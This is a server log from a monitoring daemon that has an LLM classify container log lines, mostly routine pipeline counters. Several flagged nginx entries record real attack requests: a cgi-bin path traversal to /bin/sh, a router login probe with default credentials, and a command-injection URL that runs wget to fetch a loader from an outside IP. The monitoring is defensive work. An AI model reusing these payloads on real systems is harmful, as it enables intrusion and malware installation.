Mar 20 06:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:01.950678 [observer] Pipeline: processed=2432 pattern_hits=2386 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:01.950712 [observer] Patterns: hash=2386 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:31.933737 [observer] Pipeline: processed=2437 pattern_hits=2391 llm_calls=46 llm_errors=0 learned=0
Mar 20 06:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:31.933762 [observer] Patterns: hash=2391 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=46
Mar 20 06:34:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:51.540192 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 06:34:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:51.540988 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 06:34:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:58.895774 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 06:34:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:34:58.895809 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern
Mar 20 06:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:01.942346 [observer] Pipeline: processed=2443 pattern_hits=2394 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:01.942594 [observer] Patterns: hash=2394 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:11.216775 [analyzer] LLM verdict for docker:captain-netdata-container: classification=suspicious confidence=0.55 action=alert pattern_type=
Mar 20 06:35:11 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:11.216806 [SUSPICIOUS] Source=docker:captain-netdata-container Reason=A WARNING about a missing configuration file can indicate misconfiguration or disabled features; not an attack but warrants monitoring. Line=2026-03-20T06:34:45.692238002Z 2026-03-20 06:34:45: tc-qos-helper.sh: WARNING: Cannot find file '/etc/netdata/tc-qos-helper.conf'.
Mar 20 06:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:31.948500 [observer] Pipeline: processed=2446 pattern_hits=2397 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:35:31.948525 [observer] Patterns: hash=2397 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:01.960441 [observer] Pipeline: processed=2450 pattern_hits=2401 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:01.960578 [observer] Patterns: hash=2401 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:31.944752 [observer] Pipeline: processed=2452 pattern_hits=2403 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:36:31.944783 [observer] Patterns: hash=2403 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:01.966837 [observer] Pipeline: processed=2456 pattern_hits=2407 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:01.966871 [observer] Patterns: hash=2407 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:31.943545 [observer] Pipeline: processed=2458 pattern_hits=2409 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:37:31.943571 [observer] Patterns: hash=2409 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:01.942213 [observer] Pipeline: processed=2461 pattern_hits=2412 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:01.942267 [observer] Patterns: hash=2412 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:31.935009 [observer] Pipeline: processed=2464 pattern_hits=2415 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:38:31.935044 [observer] Patterns: hash=2415 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:01.950027 [observer] Pipeline: processed=2466 pattern_hits=2417 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:01.950057 [observer] Patterns: hash=2417 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:31.934025 [observer] Pipeline: processed=2472 pattern_hits=2423 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:39:31.934046 [observer] Patterns: hash=2423 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:01.952073 [observer] Pipeline: processed=2474 pattern_hits=2425 llm_calls=49 llm_errors=0 learned=0
Mar 20 06:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:01.952104 [observer] Patterns: hash=2425 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=49
Mar 20 06:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:31.933836 [observer] Pipeline: processed=2479 pattern_hits=2428 llm_calls=51 llm_errors=0 learned=0
Mar 20 06:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:31.933861 [observer] Patterns: hash=2428 prefix=0 regex=0 contains=0 deny=6 alert=11 suppress=0 misses=51
Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.108850 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.108885 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T06:40:28.999872079Z 85.11.167.19 - - [20/Mar/2026:06:40:28 +0000] "captain.admin.kovicloud.com" "POST / HTTP/1.1" 404 9 "https://captain.admin.kovicloud.com" "Mozilla/5.0 (Windows NT 10.0; ...
Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.110483 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T06:40:29.487295201Z 85.11.167.19 - - [20/Mar/2026:06:40:29 +0000] "captain.admin.kovicloud.com" "POST / HTTP/1.1" 404 9 "https://captain.admin.kovicloud.com" "Mozilla/5.0 (Windows NT 10.0; ...
Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.406564 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 06:40:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:33.406600 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 06:40:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:40.132043 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 06:40:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:40:40.132077 [analyzer] Source hint mismatch: LLM says "docker-nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 06:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:01.955416 [observer] Pipeline: processed=2484 pattern_hits=2432 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:01.955446 [observer] Patterns: hash=2432 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:31.934127 [observer] Pipeline: processed=2487 pattern_hits=2435 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:41:31.934152 [observer] Patterns: hash=2435 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:01.958361 [observer] Pipeline: processed=2490 pattern_hits=2438 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:01.958388 [observer] Patterns: hash=2438 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:31.950332 [observer] Pipeline: processed=2492 pattern_hits=2440 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:42:31.950353 [observer] Patterns: hash=2440 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:01.980715 [observer] Pipeline: processed=2496 pattern_hits=2444 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:01.980741 [observer] Patterns: hash=2444 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:31.944104 [observer] Pipeline: processed=2498 pattern_hits=2446 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:43:31.944125 [observer] Patterns: hash=2446 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:01.943989 [observer] Pipeline: processed=2502 pattern_hits=2450 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:44:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:01.944026 [observer] Patterns: hash=2450 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:31.942149 [observer] Pipeline: processed=2506 pattern_hits=2454 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:44:31.942206 [observer] Patterns: hash=2454 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:01.957686 [observer] Pipeline: processed=2509 pattern_hits=2457 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:01.958130 [observer] Patterns: hash=2457 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:31.933909 [observer] Pipeline: processed=2512 pattern_hits=2460 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:45:31.933935 [observer] Patterns: hash=2460 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:01.948970 [observer] Pipeline: processed=2514 pattern_hits=2462 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:01.948999 [observer] Patterns: hash=2462 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:31.934962 [observer] Pipeline: processed=2518 pattern_hits=2466 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:46:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:46:31.934992 [observer] Patterns: hash=2466 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:01.949718 [observer] Pipeline: processed=2520 pattern_hits=2468 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:47:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:01.949744 [observer] Patterns: hash=2468 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:31.933778 [observer] Pipeline: processed=2524 pattern_hits=2472 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:47:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:47:31.933800 [observer] Patterns: hash=2472 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:01.984106 [observer] Pipeline: processed=2526 pattern_hits=2474 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:48:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:01.984136 [observer] Patterns: hash=2474 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:31.934682 [observer] Pipeline: processed=2529 pattern_hits=2477 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:48:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:48:31.934705 [observer] Patterns: hash=2477 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:01.940430 [observer] Pipeline: processed=2532 pattern_hits=2480 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:49:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:01.940482 [observer] Patterns: hash=2480 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:31.942925 [observer] Pipeline: processed=2536 pattern_hits=2484 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:49:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:49:31.942955 [observer] Patterns: hash=2484 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:01.995085 [observer] Pipeline: processed=2540 pattern_hits=2488 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:50:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:01.995427 [observer] Patterns: hash=2488 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:31.941895 [observer] Pipeline: processed=2542 pattern_hits=2490 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:50:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:50:31.941920 [observer] Patterns: hash=2490 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:01.942361 [observer] Pipeline: processed=2546 pattern_hits=2494 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:51:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:01.942389 [observer] Patterns: hash=2494 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:31.934012 [observer] Pipeline: processed=2548 pattern_hits=2496 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:51:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:51:31.934036 [observer] Patterns: hash=2496 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:01.953815 [observer] Pipeline: processed=2550 pattern_hits=2498 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:52:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:01.953842 [observer] Patterns: hash=2498 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:31.934797 [observer] Pipeline: processed=2554 pattern_hits=2502 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:52:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:31.934830 [observer] Patterns: hash=2502 prefix=0 regex=0 contains=0 deny=6 alert=12 suppress=0 misses=52
Mar 20 06:52:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:52:49.611996 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T06:52:49.611736189Z 125.17.108.32 - - [20/Mar/2026:06:52:49 +0000] "_" "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 150 "-" "-" "-"
Mar 20 06:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:01.943191 [observer] Pipeline: processed=2557 pattern_hits=2505 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:53:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:01.943230 [observer] Patterns: hash=2505 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52
Mar 20 06:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:31.937274 [observer] Pipeline: processed=2561 pattern_hits=2509 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:53:31.937305 [observer] Patterns: hash=2509 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52
Mar 20 06:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:01.946941 [observer] Pipeline: processed=2563 pattern_hits=2511 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:01.946966 [observer] Patterns: hash=2511 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52
Mar 20 06:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:31.935077 [observer] Pipeline: processed=2569 pattern_hits=2517 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:54:31.935108 [observer] Patterns: hash=2517 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52
Mar 20 06:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:01.959641 [observer] Pipeline: processed=2571 pattern_hits=2519 llm_calls=52 llm_errors=0 learned=0
Mar 20 06:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:01.961669 [observer] Patterns: hash=2519 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=52
Mar 20 06:55:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:29.783065 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 06:55:29 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:29.783105 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /boaform/admin/formLogin with username parameter suggests an automated attempt to probe for vulnerable admin interfaces or login forms. Not confirmed malicious, but notable. Line=2026-03-20T06:55:24.820116008Z 2026/03/20 06:55:24 [error] 422#422: *746523 open() "/usr/share/nginx/default/boaform/admin/formLogin" failed (2: No such file or directory), client: 72.255.33.117, serv...
Mar 20 06:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:31.934089 [observer] Pipeline: processed=2575 pattern_hits=2521 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:31.934114 [observer] Patterns: hash=2521 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:55:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:33.086973 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 06:55:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:55:33.087012 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Access to /boaform/admin/formLogin with username and password parameters suggests credential stuffing or probing for login forms on a web interface. Line=2026-03-20T06:55:24.820208510Z 72.255.33.117 - - [20/Mar/2026:06:55:24 +0000] "_" "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 2401 "-" "-" "-"
Mar 20 06:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:01.952748 [observer] Pipeline: processed=2579 pattern_hits=2525 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:01.952780 [observer] Patterns: hash=2525 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:31.934291 [observer] Pipeline: processed=2581 pattern_hits=2527 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:56:31.934315 [observer] Patterns: hash=2527 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:01.937707 [observer] Pipeline: processed=2585 pattern_hits=2531 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:01.937844 [observer] Patterns: hash=2531 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:31.944742 [observer] Pipeline: processed=2587 pattern_hits=2533 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:57:31.944769 [observer] Patterns: hash=2533 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:01.969377 [observer] Pipeline: processed=2591 pattern_hits=2537 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:01.969414 [observer] Patterns: hash=2537 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:31.934124 [observer] Pipeline: processed=2593 pattern_hits=2539 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:58:31.934147 [observer] Patterns: hash=2539 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:01.939697 [observer] Pipeline: processed=2595 pattern_hits=2541 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:01.939720 [observer] Patterns: hash=2541 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 06:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:31.936566 [observer] Pipeline: processed=2599 pattern_hits=2545 llm_calls=54 llm_errors=0 learned=0
Mar 20 06:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 06:59:31.936590 [observer] Patterns: hash=2545 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:01.962051 [observer] Pipeline: processed=2603 pattern_hits=2549 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:01.962085 [observer] Patterns: hash=2549 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:31.936388 [observer] Pipeline: processed=2607 pattern_hits=2553 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:00:31.936416 [observer] Patterns: hash=2553 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:01.956342 [observer] Pipeline: processed=2609 pattern_hits=2555 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:01.956551 [observer] Patterns: hash=2555 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:31.934033 [observer] Pipeline: processed=2613 pattern_hits=2559 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:01:31.934222 [observer] Patterns: hash=2559 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:01.970390 [observer] Pipeline: processed=2616 pattern_hits=2562 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:01.970421 [observer] Patterns: hash=2562 prefix=0 regex=0 contains=0 deny=6 alert=13 suppress=0 misses=54
Mar 20 07:02:25 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:25.477318 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T07:02:25.477004842Z 172.206.192.187 - - [20/Mar/2026:07:02:25 +0000] "_" "GET /cgibin/mainfunction.cgi&action=login&keyPath=wget+http%3A%2F%2F161.97.148.194%2Fnullnet_bin_dir%2Fnullnet_load...
Mar 20 07:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:31.938531 [observer] Pipeline: processed=2620 pattern_hits=2566 llm_calls=54 llm_errors=0 learned=0
Mar 20 07:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:31.938561 [observer] Patterns: hash=2566 prefix=0 regex=0 contains=0 deny=6 alert=14 suppress=0 misses=54
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005125 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005178 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "timestamp" seen in 12/20 lines, example: "2026-03-20T06:55:24.820208510Z" → "<TS>"
Mar 20 07:02:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:02:39.005189 [hints] Suggestion for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: field type "ip" seen in 23/20 lines, example: "45.156.129.65" → "<CLIENT>"
